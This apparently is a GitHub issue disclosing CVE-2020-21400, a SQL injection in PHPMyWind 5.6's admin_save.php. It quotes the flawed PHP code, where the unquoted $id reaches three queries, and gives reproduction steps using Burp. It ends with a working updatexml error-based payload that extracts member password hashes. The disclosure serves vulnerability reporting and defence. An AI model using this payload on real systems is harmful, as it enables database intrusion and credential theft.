CVE-2020-21400: i found admin/admin_save.php in PHPMyWind 5.6 has sql injection. · Issue #11 · gaozhifeng/PHPMyWind

i found a sql injection vulnerability in the backend management system of PHPMyWind 5.6
The relevant source code is as follows:

//修改管理员 else if($action == ‘update’) {

//创始人账号不允许更改状态
if($id == 1 and ($checkadmin != 'true' or $levelname != '1'))
{
    ShowMsg('抱歉，不能更改创始账号状态！','-1');
    exit();
}


//只有超级管理员才有权修改超级管理员
if($cfg\_adminlevel > 1 and $levelname == 1)
{
    ShowMsg('非法的操作，不能修改为超级管理员！', '-1');
    exit();
}


if($password == '')
{
    $sql = "UPDATE \`$tbname\` SET nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE \`id\`=$id";
}
else
{
    $oldpwd   = md5(md5($oldpwd));
    $password = md5(md5($password));

    $r = $dosql\->GetOne("SELECT \`password\` FROM \`#@\_\_admin\` WHERE \`id\`=$id");
    if($r\['password'\] != $oldpwd)
    {
        ShowMsg('抱歉，旧密码错误！','-1');
        exit();
    }

    $sql = "UPDATE \`$tbname\` SET password='$password', nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE id=$id";
}

if($dosql\->ExecNoneQuery($sql))
{
    header("location:$gourl");
    exit();
}

}

All three SQL here are vulnerability,because the variable ‘$id’ is not protected by single quotes.

Vulnerability validation：
First , we enter in this page by super administrators account or site administrators account

and click the modify buttom

Click submit and use burp to intercept to modify the variable $id to injection

POC

AND id in (char(@`’`), updatexml(1,(concat(0x7e,(select password from pmw_member limit 0,1),0x7e)),1),char(@`’`))